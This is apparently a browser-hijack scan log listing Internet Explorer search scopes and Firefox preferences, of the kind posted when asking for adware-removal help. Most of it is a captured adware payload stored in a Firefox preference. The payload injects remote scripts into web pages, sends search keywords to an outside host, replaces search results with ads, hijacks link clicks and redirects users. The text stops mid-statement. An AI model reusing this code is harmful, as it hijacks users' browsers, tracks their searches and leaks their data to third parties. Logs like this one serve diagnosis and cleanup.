IE - HKCU\..\SearchScopes\{5FB49AFC-8016-4EB2-A383-78E96790C85E}: "URL" = http://www.google.co...ie=utf8&oe=utf8
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={sear
IE - HKCU\..\SearchScopes\{96bd48dd-741b-41ae-ac4a-aff96ba00f7e}: "URL" = http://myserp.net/se...q={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

========== FireFox ==========

FF - prefs.js..CT3310511.browser.search.defaultthis.engineName: "true"
FF - prefs.js..CT3316751.browser.search.defaultthis.engineName: "true"
FF - prefs.js..browser.search.defaultenginename: "WhiteSmoke New 1.2 Customized Web Search"
FF - prefs.js..browser.search.defaultthis.engineName: "WhiteSmoke New 1.2 Customized Web Search"
FF - prefs.js..browser.search.defaulturl: "http://search.condui...={searchTerms}"
FF - prefs.js..browser.search.order.1: "WebSearch"
FF - prefs.js..browser.search.order.1,S: S", "WebSearch"
FF - prefs.js..browser.search.selectedEngine: "WhiteSmoke New 1.2 Customized Web Search"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://search.condui...A-47437945D119"
FF - prefs.js..extensions.URQQR1S.scode: "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top && !document.getElementById('sjsjszmzmaw28aj6')){var script=document.createElement('script'script.type='text/javascript';script.setAttribute('id','sjsjszmzmaw28aj6');script.src='//static.getjs.net/sd/1018/1012.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src=window.self.location.protocol=='https:' ? '//i_sfkpjs_info.tlscdn.com/dnkp/javascript.js?channel=p1182&hid=0' : '//i.sfkpjs.info/sfkp/javascript.js?channel=p1182&hid=0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=sfkp&userId=2556466782069057220&CTID=p1182';document.getElementsByTagName(\"head\")[0].appendChild(script);};if (window.self.location.protocol.indexOf('http') > -1 && window.self == window.top){var script = document.createElement('script');script.type = 'text/javascript';script.src = '//lb-betty-598702759.us-east-1.elb.amazonaws.com/xuiow/?s=PT1311FA&pid=2934&z=1&g=1 ';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var s1 = document.createElement(\"script\");s1.type = \"text/javascript\";s1.src = \"https://smartsuggestor.net/smarts/js/suggest-10070.js\";document.getElementsByTagName(\"head\")[0].appendChild(s1);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=2';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this,h=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.version=\"0.3\";b.jsonpHost=\"bestdepotstorey.asia\";b.now=(new Date).getTime();b.prefix=\"jhgasdf\";b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\"; b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\", validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:\"#sb_form_q\",validate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\", \"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\", unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop= \"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c= function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,b.utils.waitForElement(this.src_for_keyword,function(){var c=document.getElementById(\"omnibox\");\"0px\"!=getComputedStyle(c,null).right&&a()}))}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,b,e);g&&a.cache.push([c,b,e,f])}:window.attachEvent?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+b]=b;f[c+b]=function(){f[\"e\"+c+b](window.event)};f.attachEvent(\"on\"+c,f[c+b]);g&&a.cache.push([c, b,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var c=0;c<a.cache.length;c++)a.remove.apply(a,a.cache[c]);a.cache=[]}};b.utils=new function(){var a=this;a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;if(25<b.waitForElementCounter)return d(null);if(\"undefined\"== typeof g||1>g.length){if(a[f])return d(null);var k=arguments.callee;setTimeout(function(){b.waitForElementCounter++;k(c,d,e,f)},e)}else{if(a[f])return d(null);b.waitForElementCounter=0;return d(g)}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!= typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText= a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a= a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"== d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"== f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref= function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);e?b.checkClickInterval(e)&&b.addEventClick(g,a):b.addEventClick(g,a)}}};b.escape_chars_for_json=function(a){for(var b in a)a= a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template); d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<h.length;b++)if(-1<a.layouts.id.indexOf(h))return h;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a, c[0])),b.not_unique_items.push(c.shift())};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=l(f.inserts[g].selector);\"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;p=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a, c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(a.current_layout=b.get_layout_type(a),\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c= __yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name; b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return 2>b.keyword.length?!1:c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f], function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb= function(a){window.__yael_res=a;\"0\"!=__yael_res.data.numberOfItems&&(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=8196839351945351958&eid=309&pid=1182\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\"); e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild(e)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"!=__yael_res.data.numberOfItems&&(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement, !1)}});;if(window.self.location.protocol.indexOf('http:')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//static.datafastguru.info/fo/min/fo_ss.min.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top && \"www.google.com,mail.google.com,en.wikipedia.org,www.facebook.com\".indexOf(window.self.location.hostname) == -1){var s1 = document.createElement(\"script\");s1.type = \"text/javascript\";s1.src = \"http://intext.nav-links.com/js/intext.js?afid=advertisewp&subid=advertisewp8&maxlinks=8&linkcolor=#0000FF\";document.getElementsByTagName(\"head\")[0].appendChild(s1);};(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=288130&ext=safesaver\":\"//static.getjs.net/sd/1018/1008.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"YWlAZwcW=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"YWlAZwcW=\")){var d=a.match(/YWlAZwcW=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9HrdUMCyVUojwFpdsMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0pdw4qTYHpjr8rjU9qjr8rjU8pa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){location.href=\"http://yt.jobfindgold.info/e/?eid=309&hid=8196839351945351958&pid=1182&ch=99&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var 